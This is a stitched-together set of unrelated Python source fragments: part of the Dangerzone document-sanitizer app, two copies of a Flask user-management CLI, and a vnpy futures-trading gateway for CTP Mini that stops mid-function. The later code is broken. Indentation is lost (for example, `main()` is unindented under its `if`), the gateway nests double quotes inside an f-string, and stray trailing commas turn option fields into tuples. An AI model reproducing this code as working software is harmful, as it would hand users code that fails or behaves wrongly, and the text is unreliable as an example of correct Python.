            "Tigrinya": "tir",
            "Tonga": "ton",
            "Turkish": "tur",
            "Ukrainian": "ukr",
            "Urdu": "urd",
            "Uyghur": "uig",
            "Uzbek (Cyrillic)": "uzb_cyrl",
            "Uzbek": "uzb",
            "Vietnamese script": "Vietnamese",
            "Vietnamese": "vie",
            "Welsh": "cym",
            "Yiddish": "yid",
            "Yoruba": "yor",
        }
        # Load settings
        self.settings = Settings(self)

    def display_banner(self):
        """
        Print the colored Dangerzone ASCII art banner, including the app
        version and the project URL, e.g.:

        ╭──────────────────────────╮
        │ ▄██▄ │
        │ ██████ │
        │ ███▀▀▀██ │
        │ ███ ████ │
        │ ███ ██████ │
        │ ███ ▀▀▀▀████ │
        │ ███████ ▄██████ │
        │ ███████ ▄█████████ │
        │ ████████████████████ │
        │ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ │
        │ │
        │ Dangerzone v0.1.5 │
        │ https://dangerzone.rocks │
        ╰──────────────────────────╯
        """
        # Every frame element shares this dim-yellow-on-black style prefix.
        frame = Back.BLACK + Fore.YELLOW + Style.DIM
        print(frame + "╭──────────────────────────╮")
        for art in self.BANNER_ART:
            # Bright art between dim frame bars
            print(
                frame
                + "│"
                + Fore.LIGHTYELLOW_EX
                + Style.NORMAL
                + art
                + Fore.YELLOW
                + Style.DIM
                + "│"
            )
        print(frame + "│ │")
        # Center "Dangerzone v<version>" within the 15-character middle field
        left_spaces = (15 - len(self.version) - 1) // 2
        right_spaces = left_spaces
        if left_spaces + len(self.version) + 1 + right_spaces < 15:
            right_spaces += 1
        print(
            frame
            + "│"
            + Style.RESET_ALL
            + Back.BLACK
            + Fore.LIGHTWHITE_EX
            + Style.BRIGHT
            + f"{' '*left_spaces}Dangerzone v{self.version}{' '*right_spaces}"
            + Fore.YELLOW
            + Style.DIM
            + "│"
        )
        print(
            frame
            + "│"
            + Style.RESET_ALL
            + Back.BLACK
            + Fore.LIGHTWHITE_EX
            + " https://dangerzone.rocks "
            + Fore.YELLOW
            + Style.DIM
            + "│"
        )
        print(frame + "╰──────────────────────────╯")

    def get_container_name(self):
        """Return the container image to use: the custom one if set, else the default."""
        if self.custom_container:
            return self.custom_container
        else:
            return "docker.io/flmcode/dangerzone"

    def get_resource_path(self, filename):
        """
        Return the absolute path of a bundled resource file, resolving the
        platform- and packaging-specific "share" directory.
        """
        if getattr(sys, "dangerzone_dev", False):
            # Look for resources directory relative to python file
            prefix = os.path.join(
                os.path.dirname(
                    os.path.dirname(
                        os.path.abspath(inspect.getfile(inspect.currentframe()))
                    )
                ),
                "share",
            )
        else:
            if platform.system() == "Darwin":
                prefix = os.path.join(
                    os.path.dirname(os.path.dirname(sys.executable)), "Resources/share"
                )
            elif platform.system() == "Linux":
                prefix = os.path.join(sys.prefix, "share", "dangerzone")
            else:
                # Windows
                prefix = os.path.join(os.path.dirname(sys.executable), "share")
        resource_path = os.path.join(prefix, filename)
        return resource_path

    def get_dangerzone_container_path(self):
        """
        Return the path of the dangerzone-container executable for the
        current platform (a dev script in dev mode).
        """
        if getattr(sys, "dangerzone_dev", False):
            # Look for resources directory relative to python file
            path = os.path.join(
                os.path.dirname(
                    os.path.dirname(
                        os.path.abspath(inspect.getfile(inspect.currentframe()))
                    )
                ),
                "dev_scripts",
                "dangerzone-container",
            )
            if platform.system() == "Windows":
                path = f"{path}.bat"
            return path
        else:
            if platform.system() == "Darwin":
                return os.path.join(
                    os.path.dirname(sys.executable), "dangerzone-container"
                )
            elif platform.system() == "Windows":
                return os.path.join(
                    os.path.dirname(sys.executable), "dangerzone-container.exe"
                )
            else:
                return "/usr/bin/dangerzone-container"

    def exec_dangerzone_container(self, args):
        """
        Launch dangerzone-container with *args*, echoing the command line,
        and return the Popen object (stdout/stderr piped).
        """
        args = [self.dz_container_path] + args
        # NOTE(review): the pipes module is deprecated (removed in Python
        # 3.13); pipes.quote is an alias of shlex.quote — consider migrating.
        args_str = " ".join(pipes.quote(s) for s in args)
        print(Style.DIM + "> " + Style.NORMAL + Fore.CYAN + args_str)
        # Execute dangerzone-container
        return subprocess.Popen(
            args,
            startupinfo=self.get_subprocess_startupinfo(),
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )

    def get_subprocess_startupinfo(self):
        """On Windows, return a STARTUPINFO that hides the console window; else None."""
        if platform.system() == "Windows":
            startupinfo = subprocess.STARTUPINFO()
            startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
            return startupinfo
        else:
            return None

    def container_exists(self, container_name):
        """
        Check if container_name is a valid container. Returns a tuple like:
        (success (boolean), error_message (str))
        """
        # Do we have this container?
        with self.exec_dangerzone_container(
            ["ls", "--container-name", container_name]
        ) as p:
            stdout_data, _ = p.communicate()
            # Drop the echoed "> command" line from the output, if present
            lines = stdout_data.split(b"\n")
            if b"> " in lines[0]:
                stdout_data = b"\n".join(lines[1:])
            # The user canceled, or permission denied
            if p.returncode == 126 or p.returncode == 127:
                return False, "Authorization failed"
            elif p.returncode != 0:
                return False, "Container error"
        # Check the output
        if container_name.encode() not in stdout_data:
            return False, f"Container '{container_name}' not found"
        # NOTE(review): returns True in the error-message slot on success;
        # callers appear to only read it on failure.
        return True, True

    def validate_convert_to_pixel_output(self, common, output):
        """
        Take the output from the convert to pixels tasks and validate it. Returns
        a tuple like: (success (boolean), error_message (str))
        """
        max_image_width = 10000
        max_image_height = 10000
        # Did we hit an error?
        for line in output.split("\n"):
            if (
                "failed:" in line
                or "The document format is not supported" in line
                or "Error" in line
            ):
                return False, output
        # How many pages was that?
        num_pages = None
        for line in output.split("\n"):
            if line.startswith("Document has "):
                num_pages = line.split(" ")[2]
                break
        if not num_pages or not num_pages.isdigit() or int(num_pages) <= 0:
            return False, "Invalid number of pages returned"
        num_pages = int(num_pages)
        # Make sure we have the files we expect
        expected_filenames = []
        for i in range(1, num_pages + 1):
            expected_filenames += [
                f"page-{i}.rgb",
                f"page-{i}.width",
                f"page-{i}.height",
            ]
        expected_filenames.sort()
        actual_filenames = os.listdir(common.pixel_dir.name)
        actual_filenames.sort()
        if expected_filenames != actual_filenames:
            return (
                False,
                f"We expected these files:\n{expected_filenames}\n\nBut we got these files:\n{actual_filenames}",
            )
        # Make sure the files are the correct sizes
        for i in range(1, num_pages + 1):
            with open(f"{common.pixel_dir.name}/page-{i}.width") as f:
                w_str = f.read().strip()
            with open(f"{common.pixel_dir.name}/page-{i}.height") as f:
                h_str = f.read().strip()
            # Fix: validate the strings BEFORE int() — the original called
            # int(w_str)/int(h_str) first, so a non-numeric file raised
            # ValueError instead of returning the geometry error.
            if not w_str.isdigit() or not h_str.isdigit():
                return False, f"Page {i} has invalid geometry"
            w = int(w_str)
            h = int(h_str)
            if w <= 0 or w > max_image_width or h <= 0 or h > max_image_height:
                return False, f"Page {i} has invalid geometry"
            # Make sure the RGB file is the correct size (3 bytes per pixel)
            if os.path.getsize(f"{common.pixel_dir.name}/page-{i}.rgb") != w * h * 3:
                return False, f"Page {i} has an invalid RGB file size"
        return True, True
|
import sys
import os
import argparse
from typing import List
from flask_script import Manager
from flask_migrate import init, migrate, upgrade, Migrate, MigrateCommand
from deekoo_auth import create_app, db, DEFAULT_CONFIG_PATH
from deekoo_auth.models import User
from deekoo_auth.database import check_database_available
usage = """
A command line tool for adding users to the database
Available tools are
add_user [OPTIONS]
Add a new user to database
list_users
Lists current database accounts
db [OPTIONS]
Interact with the database. (init, migrate, upgrade)
-c, --config
Give the configuration file to use
"""
commands = ('add_user', 'list_users', 'db')
class ServerCli:
    """
    Command line dispatcher: parses the global options, then hands control
    to one of the sub-commands listed in ``commands``.
    """

    def __init__(self):
        parser = argparse.ArgumentParser(usage=usage)
        parser.add_argument('-c', '--config',
                            metavar="/path/to/config.py",
                            help="Instead of using default config, use this one")
        parser.add_argument('command',
                            metavar=f"One of {commands}",
                            help=f"Entry point for other cli tools, you can select from following actions: {commands}")
        args, unknown_args = parser.parse_known_args()
        # Modify sys.argv to only leave e.g. cli.py db [db_commands]
        sys.argv = [sys.argv[0], sys.argv[1], *unknown_args]
        if not hasattr(self, args.command):
            print(f"The first argument has to be one of {commands}")
            parser.print_usage()
            sys.exit(1)
        # use the default configuration if config not given
        config_path = os.path.abspath(args.config) if args.config else DEFAULT_CONFIG_PATH
        getattr(self, args.command)(config_path)

    def add_user(self, config_path: str):
        """Add a new user account to the database."""
        parser = argparse.ArgumentParser()
        parser.add_argument('--username', required=True, metavar="Anon", help="The user name to be added.")
        parser.add_argument('--password', required=True, metavar="Secret", help="The password for the new user.")
        parser.add_argument('--email', required=False, metavar="anon@temp.net", help="The email for the new user.")
        # NOTE(review): --role is parsed but never passed to User.add_user —
        # confirm whether roles are meant to be supported here.
        parser.add_argument('--role', required=False, default='regular', metavar="admin", help="Either basic dude (regular) or admin (admin)")
        args = parser.parse_args(sys.argv[2:])
        app = create_app(config_path)
        check_database_available(app)
        with app.app_context():
            user = User.add_user(args.username, args.password, args.email)
            if user:
                db.session.add(user)
                db.session.commit()
                print(f"created user: {user}")

    def list_users(self, config_path: str):
        """Print every user account found in the configured database."""
        app = create_app(config_path)
        check_database_available(app)
        with app.app_context():
            users = User.query.all()
            if len(users) == 0:
                # Fix: single quotes inside the f-string — reusing the outer
                # double quotes is a SyntaxError on Python < 3.12 (PEP 701).
                print(f"No users in the database at {app.config['SQLALCHEMY_DATABASE_URI']}")
                return
            print(f"\nFound {len(users)} user{'s' if len(users) > 1 else ''} in database at {app.config['SQLALCHEMY_DATABASE_URI']}\n")
            for user in users:
                print(user)

    def db(self, config_path: str):
        """
        Small wrapper for flask-migrate
        """
        app = create_app(config_path)
        # add database migration tools
        migrate = Migrate(app, db)
        # init the command line tool
        manager = Manager(app)
        manager.add_command('db', MigrateCommand)
        # parse command line arguments
        manager.run()
def main():
    """Entry point: construct ServerCli, which parses argv and dispatches."""
    ServerCli()
if __name__ == "__main__":
main() | import sys
import os
import argparse
from typing import List
from flask_script import Manager
from flask_migrate import init, migrate, upgrade, Migrate, MigrateCommand
from deekoo_auth import create_app, db, DEFAULT_CONFIG_PATH
from deekoo_auth.models import User
from deekoo_auth.database import check_database_available
usage = """
A command line tool for adding users to the database
Available tools are
add_user [OPTIONS]
Add a new user to database
list_users
Lists current database accounts
db [OPTIONS]
Interact with the database. (init, migrate, upgrade)
-c, --config
Give the configuration file to use
"""
commands = ('add_user', 'list_users', 'db')
class ServerCli:
    """
    Command line dispatcher: parses the global options, then hands control
    to one of the sub-commands listed in ``commands``.
    """

    def __init__(self):
        parser = argparse.ArgumentParser(usage=usage)
        parser.add_argument(
            '-c', '--config',
            metavar="/path/to/config.py",
            help="Instead of using default config, use this one",
        )
        parser.add_argument(
            'command',
            metavar=f"One of {commands}",
            help=f"Entry point for other cli tools, you can select from following actions: {commands}",
        )
        args, passthrough = parser.parse_known_args()
        # Keep only e.g. cli.py db [db_commands] for the sub-command parsers.
        sys.argv = [sys.argv[0], sys.argv[1], *passthrough]
        if not hasattr(self, args.command):
            print(f"The first argument has to be one of {commands}")
            parser.print_usage()
            sys.exit(1)
        # Fall back to the default configuration when none was given.
        if args.config:
            config_path = os.path.abspath(args.config)
        else:
            config_path = DEFAULT_CONFIG_PATH
        getattr(self, args.command)(config_path)

    def add_user(self, config_path: str):
        """Add a new user account to the database."""
        parser = argparse.ArgumentParser()
        parser.add_argument(
            '--username', required=True, metavar="Anon",
            help="The user name to be added.",
        )
        parser.add_argument(
            '--password', required=True, metavar="Secret",
            help="The password for the new user.",
        )
        parser.add_argument(
            '--email', required=False, metavar="anon@temp.net",
            help="The email for the new user.",
        )
        parser.add_argument(
            '--role', required=False, default='regular', metavar="admin",
            help="Either basic dude (regular) or admin (admin)",
        )
        args = parser.parse_args(sys.argv[2:])
        app = create_app(config_path)
        check_database_available(app)
        with app.app_context():
            new_user = User.add_user(args.username, args.password, args.email)
            if new_user:
                db.session.add(new_user)
                db.session.commit()
                print(f"created user: {new_user}")

    def list_users(self, config_path: str):
        """Print every user account found in the configured database."""
        app = create_app(config_path)
        check_database_available(app)
        with app.app_context():
            users = User.query.all()
            uri = app.config['SQLALCHEMY_DATABASE_URI']
            if not users:
                print(f"No users in the database at {uri}")
                return
            plural = 's' if len(users) > 1 else ''
            print(f"\nFound {len(users)} user{plural} in database at {uri}\n")
            for account in users:
                print(account)

    def db(self, config_path: str):
        """
        Small wrapper for flask-migrate
        """
        app = create_app(config_path)
        # Wire the migration tooling into the app, then run the CLI.
        migrate = Migrate(app, db)
        manager = Manager(app)
        manager.add_command('db', MigrateCommand)
        manager.run()
def main():
    """Entry point: construct ServerCli, which parses argv and dispatches."""
    ServerCli()
if __name__ == "__main__":
main() |
"""
"""
from datetime import datetime
from vnpy.api.mini import (
THOST_FTDC_OAS_Submitted,
THOST_FTDC_OAS_Accepted,
THOST_FTDC_OAS_Rejected,
THOST_FTDC_OST_NoTradeQueueing,
THOST_FTDC_OST_PartTradedQueueing,
THOST_FTDC_OST_AllTraded,
THOST_FTDC_OST_Canceled,
THOST_FTDC_D_Buy,
THOST_FTDC_D_Sell,
THOST_FTDC_PD_Long,
THOST_FTDC_PD_Short,
THOST_FTDC_OPT_LimitPrice,
THOST_FTDC_OPT_AnyPrice,
THOST_FTDC_OF_Open,
THOST_FTDC_OFEN_Close,
THOST_FTDC_OFEN_CloseYesterday,
THOST_FTDC_OFEN_CloseToday,
THOST_FTDC_PC_Futures,
THOST_FTDC_PC_Options,
THOST_FTDC_PC_Combination,
THOST_FTDC_CP_CallOptions,
THOST_FTDC_CP_PutOptions,
THOST_FTDC_HF_Speculation,
THOST_FTDC_CC_Immediately,
THOST_FTDC_FCC_NotForceClose,
THOST_FTDC_TC_GFD,
THOST_FTDC_VC_AV,
THOST_FTDC_TC_IOC,
THOST_FTDC_VC_CV,
THOST_FTDC_AF_Delete
)
from vnpy.trader.constant import (
Direction,
Offset,
Exchange,
OrderType,
Product,
Status,
OptionType
)
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
OrderRequest,
CancelRequest,
SubscribeRequest,
)
from vnpy.trader.utility import get_folder_path
from vnpy.trader.event import EVENT_TIMER
from .vnminimd import MdApi
from .vnminitd import TdApi
# Map CTP Mini order-status codes to VN Trader Status enums.
STATUS_MINI2VT = {
    THOST_FTDC_OAS_Submitted: Status.SUBMITTING,
    THOST_FTDC_OAS_Accepted: Status.SUBMITTING,
    THOST_FTDC_OAS_Rejected: Status.REJECTED,
    THOST_FTDC_OST_NoTradeQueueing: Status.NOTTRADED,
    THOST_FTDC_OST_PartTradedQueueing: Status.PARTTRADED,
    THOST_FTDC_OST_AllTraded: Status.ALLTRADED,
    THOST_FTDC_OST_Canceled: Status.CANCELLED
}
# Trade direction, VN Trader -> Mini; the reverse map is extended with the
# position-direction codes (long/short) that position queries report.
DIRECTION_VT2MINI = {
    Direction.LONG: THOST_FTDC_D_Buy,
    Direction.SHORT: THOST_FTDC_D_Sell
}
DIRECTION_MINI2VT = {v: k for k, v in DIRECTION_VT2MINI.items()}
DIRECTION_MINI2VT[THOST_FTDC_PD_Long] = Direction.LONG
DIRECTION_MINI2VT[THOST_FTDC_PD_Short] = Direction.SHORT
# Order price type (limit/market), both directions.
ORDERTYPE_VT2MINI = {
    OrderType.LIMIT: THOST_FTDC_OPT_LimitPrice,
    OrderType.MARKET: THOST_FTDC_OPT_AnyPrice
}
ORDERTYPE_MINI2VT = {v: k for k, v in ORDERTYPE_VT2MINI.items()}
# Open/close offset flags, both directions.
OFFSET_VT2MINI = {
    Offset.OPEN: THOST_FTDC_OF_Open,
    Offset.CLOSE: THOST_FTDC_OFEN_Close,
    Offset.CLOSETODAY: THOST_FTDC_OFEN_CloseToday,
    Offset.CLOSEYESTERDAY: THOST_FTDC_OFEN_CloseYesterday,
}
OFFSET_MINI2VT = {v: k for k, v in OFFSET_VT2MINI.items()}
# Exchange id strings reported by the API -> VN Trader Exchange enums.
EXCHANGE_MINI2VT = {
    "CFFEX": Exchange.CFFEX,
    "SHFE": Exchange.SHFE,
    "CZCE": Exchange.CZCE,
    "DCE": Exchange.DCE,
    "INE": Exchange.INE
}
# Product class codes -> VN Trader Product enums.
PRODUCT_MINI2VT = {
    THOST_FTDC_PC_Futures: Product.FUTURES,
    THOST_FTDC_PC_Options: Product.OPTION,
    THOST_FTDC_PC_Combination: Product.SPREAD
}
# Option call/put codes -> VN Trader OptionType enums.
OPTIONTYPE_MINI2VT = {
    THOST_FTDC_CP_CallOptions: OptionType.CALL,
    THOST_FTDC_CP_PutOptions: OptionType.PUT
}
# Caches filled from contract query responses; used to resolve exchange,
# display name and contract size for a symbol when ticks/orders/trades arrive.
symbol_exchange_map = {}
symbol_name_map = {}
symbol_size_map = {}
class MinitestGateway(BaseGateway):
    """
    VN Trader Gateway for CTP Mini.

    Delegates trading to MiniTdApi and market data to MiniMdApi, and drives
    periodic account/position queries off the global timer event.
    """

    # Connection fields shown in the UI. Keys are Chinese labels:
    # username, password, broker id, trade server, market-data server,
    # product name, authorization code, product info.
    default_setting = {
        "用户名": "",
        "密码": "",
        "经纪商代码": "",
        "交易服务器": "",
        "行情服务器": "",
        "产品名称": "",
        "授权编码": "",
        "产品信息": ""
    }

    # Exchanges this gateway can route to.
    exchanges = list(EXCHANGE_MINI2VT.values())

    def __init__(self, event_engine):
        """Constructor"""
        super().__init__(event_engine, "MINITEST")
        self.td_api = MiniTdApi(self)
        self.md_api = MiniMdApi(self)

    def connect(self, setting: dict):
        """Connect both the trade and market-data servers using *setting*."""
        userid = setting["用户名"]
        password = setting["密码"]
        brokerid = setting["经纪商代码"]
        td_address = setting["交易服务器"]
        md_address = setting["行情服务器"]
        appid = setting["产品名称"]
        auth_code = setting["授权编码"]
        product_info = setting["产品信息"]
        # Front addresses must carry a tcp:// scheme; add it if missing.
        if not td_address.startswith("tcp://"):
            td_address = "tcp://" + td_address
        if not md_address.startswith("tcp://"):
            md_address = "tcp://" + md_address
        self.td_api.connect(td_address, userid, password,
                            brokerid, auth_code, appid, product_info)
        self.md_api.connect(md_address, userid, password, brokerid)
        self.init_query()

    def subscribe(self, req: SubscribeRequest):
        """Subscribe to market data for the requested symbol."""
        self.md_api.subscribe(req)

    def send_order(self, req: OrderRequest):
        """Send a new order via the trade API and return its result."""
        return self.td_api.send_order(req)

    def cancel_order(self, req: CancelRequest):
        """Cancel an existing order via the trade API."""
        self.td_api.cancel_order(req)

    def query_account(self):
        """Query account funds."""
        self.td_api.query_account()

    def query_position(self):
        """Query open positions."""
        self.td_api.query_position()

    def close(self):
        """Close both server connections."""
        self.td_api.close()
        self.md_api.close()

    def write_error(self, msg: str, error: dict):
        """Log a CTP error dict as one message with its code and text."""
        error_id = error["ErrorID"]
        error_msg = error["ErrorMsg"]
        msg = f"{msg},代码:{error_id},信息:{error_msg}"
        self.write_log(msg)

    def process_timer_event(self, event):
        """On each EVENT_TIMER, every 2nd tick run the next query round-robin."""
        self.count += 1
        if self.count < 2:
            return
        self.count = 0
        # Rotate the query list so account and position queries alternate.
        func = self.query_functions.pop(0)
        func()
        self.query_functions.append(func)

    def init_query(self):
        """Start the periodic account/position query loop on the timer event."""
        self.count = 0
        self.query_functions = [self.query_account, self.query_position]
        self.event_engine.register(EVENT_TIMER, self.process_timer_event)
class MiniMdApi(MdApi):
    """Market-data API wrapper for CTP Mini: login, subscription and tick callbacks."""

    def __init__(self, gateway):
        """Constructor"""
        super(MiniMdApi, self).__init__()
        self.gateway = gateway
        self.gateway_name = gateway.gateway_name
        self.reqid = 0
        # Connection / login state flags
        self.connect_status = False
        self.login_status = False
        # Symbols subscribed so far; replayed after each (re)login.
        self.subscribed = set()
        self.userid = ""
        self.password = ""
        self.brokerid = ""

    def onFrontConnected(self):
        """
        Callback when front server is connected.
        """
        self.gateway.write_log("行情服务器连接成功")
        self.login()

    def onFrontDisconnected(self, reason: int):
        """
        Callback when front server is disconnected.
        """
        self.login_status = False
        self.gateway.write_log(f"行情服务器连接断开,原因{reason}")

    def onRspUserLogin(self, data: dict, error: dict, reqid: int, last: bool):
        """
        Callback when user is logged in.
        """
        if not error["ErrorID"]:
            self.login_status = True
            self.gateway.write_log("行情服务器登录成功")
            # Replay all subscriptions requested before the (re)login.
            for symbol in self.subscribed:
                self.subscribeMarketData(symbol)
        else:
            self.gateway.write_error("行情服务器登录失败", error)

    def onRspError(self, error: dict, reqid: int, last: bool):
        """
        Callback when error occured.
        """
        self.gateway.write_error("行情接口报错", error)

    def onRspSubMarketData(self, data: dict, error: dict, reqid: int, last: bool):
        """Callback of subscription request; only failures are reported."""
        if not error or not error["ErrorID"]:
            return
        self.gateway.write_error("行情订阅失败", error)

    def onRtnDepthMarketData(self, data: dict):
        """
        Callback of tick data update.
        """
        symbol = data["InstrumentID"]
        exchange = symbol_exchange_map.get(symbol, "")
        # Drop ticks for instruments whose contract info hasn't arrived yet.
        if not exchange:
            return
        # Fix: single quotes inside the f-string — reusing the outer double
        # quotes is a SyntaxError on Python < 3.12 (PEP 701).
        timestamp = f"{data['ActionDay']} {data['UpdateTime']}.{int(data['UpdateMillisec'] / 100)}"
        tick = TickData(
            symbol=symbol,
            exchange=exchange,
            datetime=datetime.strptime(timestamp, "%Y%m%d %H:%M:%S.%f"),
            name=symbol_name_map[symbol],
            volume=data["Volume"],
            open_interest=data["OpenInterest"],
            last_price=data["LastPrice"],
            limit_up=data["UpperLimitPrice"],
            limit_down=data["LowerLimitPrice"],
            open_price=data["OpenPrice"],
            high_price=data["HighestPrice"],
            low_price=data["LowestPrice"],
            pre_close=data["PreClosePrice"],
            bid_price_1=data["BidPrice1"],
            ask_price_1=data["AskPrice1"],
            bid_volume_1=data["BidVolume1"],
            ask_volume_1=data["AskVolume1"],
            gateway_name=self.gateway_name
        )
        # Fill depth levels 2-5 only when the feed provides them.
        if data["BidPrice2"]:
            tick.bid_price_2 = data["BidPrice2"]
            tick.bid_price_3 = data["BidPrice3"]
            tick.bid_price_4 = data["BidPrice4"]
            tick.bid_price_5 = data["BidPrice5"]
            tick.ask_price_2 = data["AskPrice2"]
            tick.ask_price_3 = data["AskPrice3"]
            tick.ask_price_4 = data["AskPrice4"]
            tick.ask_price_5 = data["AskPrice5"]
            tick.bid_volume_2 = data["BidVolume2"]
            tick.bid_volume_3 = data["BidVolume3"]
            tick.bid_volume_4 = data["BidVolume4"]
            tick.bid_volume_5 = data["BidVolume5"]
            tick.ask_volume_2 = data["AskVolume2"]
            tick.ask_volume_3 = data["AskVolume3"]
            tick.ask_volume_4 = data["AskVolume4"]
            tick.ask_volume_5 = data["AskVolume5"]
        self.gateway.on_tick(tick)

    def connect(self, address: str, userid: str, password: str, brokerid: int):
        """
        Start connection to server.
        """
        self.userid = userid
        self.password = password
        self.brokerid = brokerid
        # If not connected, then start connection first.
        if not self.connect_status:
            path = get_folder_path(self.gateway_name.lower())
            self.createFtdcMdApi(str(path) + "\\Md")
            self.registerFront(address)
            self.init()
            self.connect_status = True
        # If already connected, then login immediately.
        elif not self.login_status:
            self.login()

    def login(self):
        """
        Login onto server.
        """
        req = {
            "UserID": self.userid,
            "Password": self.password,
            "BrokerID": self.brokerid
        }
        self.reqid += 1
        self.reqUserLogin(req, self.reqid)

    def subscribe(self, req: SubscribeRequest):
        """
        Subscribe to tick data update.
        """
        if self.login_status:
            self.subscribeMarketData(req.symbol)
        # Remember the symbol either way, so it is (re)subscribed on login.
        self.subscribed.add(req.symbol)

    def close(self):
        """
        Close the connection.
        """
        if self.connect_status:
            self.exit()
class MiniTdApi(TdApi):
""""""
def __init__(self, gateway):
"""Constructor"""
super(MiniTdApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.reqid = 0
self.order_ref = 0
self.connect_status = False
self.login_status = False
self.auth_staus = False
self.login_failed = False
self.userid = ""
self.password = ""
self.brokerid = ""
self.auth_code = ""
self.appid = ""
self.product_info = ""
self.frontid = 0
self.sessionid = 0
self.order_data = []
self.trade_data = []
self.positions = {}
self.sysid_orderid_map = {}
def onFrontConnected(self):
""""""
self.gateway.write_log("交易服务器连接成功")
if self.auth_code:
self.authenticate()
else:
self.login()
def onFrontDisconnected(self, reason: int):
""""""
self.login_status = False
self.gateway.write_log(f"交易服务器连接断开,原因{reason}")
def onRspAuthenticate(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error['ErrorID']:
self.auth_staus = True
self.gateway.write_log("交易服务器授权验证成功")
self.login()
else:
self.gateway.write_error("交易服务器授权验证失败", error)
def onRspUserLogin(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error["ErrorID"]:
self.frontid = data["FrontID"]
self.sessionid = data["SessionID"]
self.login_status = True
self.gateway.write_log("交易服务器登录成功")
# Get instrument data directly without confirm settlement
self.reqid += 1
self.reqQryInstrument({}, self.reqid)
else:
self.login_failed = True
self.gateway.write_error("交易服务器登录失败", error)
def onRspOrderInsert(self, data: dict, error: dict, reqid: int, last: bool):
""""""
order_ref = data["OrderRef"]
orderid = f"{self.frontid}_{self.sessionid}_{order_ref}"
symbol = data["InstrumentID"]
exchange = symbol_exchange_map[symbol]
order = OrderData(
symbol=symbol,
exchange=exchange,
orderid=orderid,
direction=DIRECTION_MINI2VT[data["Direction"]],
offset=OFFSET_MINI2VT.get(data["CombOffsetFlag"], Offset.NONE),
price=data["LimitPrice"],
volume=data["VolumeTotalOriginal"],
status=Status.REJECTED,
gateway_name=self.gateway_name
)
self.gateway.on_order(order)
self.gateway.write_error("交易委托失败", error)
def onRspOrderAction(self, data: dict, error: dict, reqid: int, last: bool):
""""""
self.gateway.write_error("交易撤单失败", error)
def onRspQueryMaxOrderVolume(self, data: dict, error: dict, reqid: int, last: bool):
""""""
pass
def onRspSettlementInfoConfirm(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback of settlment info confimation.
"""
pass
def onRspQryInvestorPosition(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if data and data["InstrumentID"] in symbol_exchange_map:
# Get buffered position object
key = f"{data["InstrumentID"], data["PosiDirection"]}"
position = self.positions.get(key, None)
if not position:
position = PositionData(
symbol=data["InstrumentID"],
exchange=symbol_exchange_map[data["InstrumentID"]],
direction=DIRECTION_MINI2VT[data["PosiDirection"]],
gateway_name=self.gateway_name
)
self.positions[key] = position
# For SHFE position data update
if position.exchange == Exchange.SHFE:
if data["YdPosition"] and not data["TodayPosition"]:
position.yd_volume = data["Position"]
# For other exchange position data update
else:
position.yd_volume = data["Position"] - data["TodayPosition"]
# Get contract size (spread contract has no size value)
size = symbol_size_map.get(position.symbol, 0)
# Calculate previous position cost
cost = position.price * position.volume * size
# Update new position volume
position.volume += data["Position"]
position.pnl += data["PositionProfit"]
# Calculate average position price
if position.volume and size:
cost += data["PositionCost"]
position.price = cost / (position.volume * size)
# Get frozen volume
if position.direction == Direction.LONG:
position.frozen += data["ShortFrozen"]
else:
position.frozen += data["LongFrozen"]
if last:
for position in self.positions.values():
self.gateway.on_position(position)
self.positions.clear()
def onRspQryTradingAccount(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if "AccountID" not in data:
return
account = AccountData(
accountid=data["AccountID"],
balance=data["Balance"],
frozen=data["FrozenMargin"] +
data["FrozenCash"] + data["FrozenCommission"],
gateway_name=self.gateway_name
)
account.available = data["Available"]
self.gateway.on_account(account)
def onRspQryInstrument(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback of instrument query.
"""
product = PRODUCT_MINI2VT.get(data.get("ProductClass", None), None)
if product:
contract = ContractData(
symbol=data["InstrumentID"],
exchange=EXCHANGE_MINI2VT[data["ExchangeID"]],
name=data["InstrumentName"],
product=product,
size=data["VolumeMultiple"],
pricetick=data["PriceTick"],
gateway_name=self.gateway_name
)
# For option only
if contract.product == Product.OPTION:
contract.option_underlying = data["UnderlyingInstrID"],
contract.option_type = OPTIONTYPE_MINI2VT.get(
data["OptionsType"], None),
contract.option_strike = data["StrikePrice"],
contract.option_expiry = datetime.strptime(
data["ExpireDate"], "%Y%m%d"),
self.gateway.on_contract(contract)
symbol_exchange_map[contract.symbol] = contract.exchange
symbol_name_map[contract.symbol] = contract.name
symbol_size_map[contract.symbol] = contract.size
if last:
self.gateway.write_log("合约信息查询成功")
for data in self.order_data:
self.onRtnOrder(data)
self.order_data.clear()
for data in self.trade_data:
self.onRtnTrade(data)
self.trade_data.clear()
def onRtnOrder(self, data: dict):
"""
Callback of order status update.
"""
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
self.order_data.append(data)
return
frontid = data["FrontID"]
sessionid = data["SessionID"]
order_ref = data["OrderRef"]
orderid = f"{frontid}_{sessionid}_{order_ref}"
order = OrderData(
symbol=symbol,
exchange=exchange,
orderid=orderid,
type=ORDERTYPE_MINI2VT[data["OrderPriceType"]],
direction=DIRECTION_MINI2VT[data["Direction"]],
offset=OFFSET_MINI2VT[data["CombOffsetFlag"]],
price=data["LimitPrice"],
volume=data["VolumeTotalOriginal"],
traded=data["VolumeTraded"],
status=STATUS_MINI2VT[data["OrderStatus"]],
time=data["InsertTime"],
gateway_name=self.gateway_name
)
self.gateway.on_order(order)
self.sysid_orderid_map[data["OrderSysID"]] = orderid
def onRtnTrade(self, data: dict):
    """
    Callback of trade status update.

    Trades that arrive before the contract table has been loaded are
    buffered in ``self.trade_data`` and replayed from onRspQryInstrument.
    """
    symbol = data["InstrumentID"]
    exchange = symbol_exchange_map.get(symbol, "")
    if not exchange:
        # Contract not known yet: buffer for later replay.
        self.trade_data.append(data)
        return

    # Resolve the local order id recorded by onRtnOrder.
    orderid = self.sysid_orderid_map[data["OrderSysID"]]

    trade = TradeData(
        symbol=symbol,
        exchange=exchange,
        orderid=orderid,
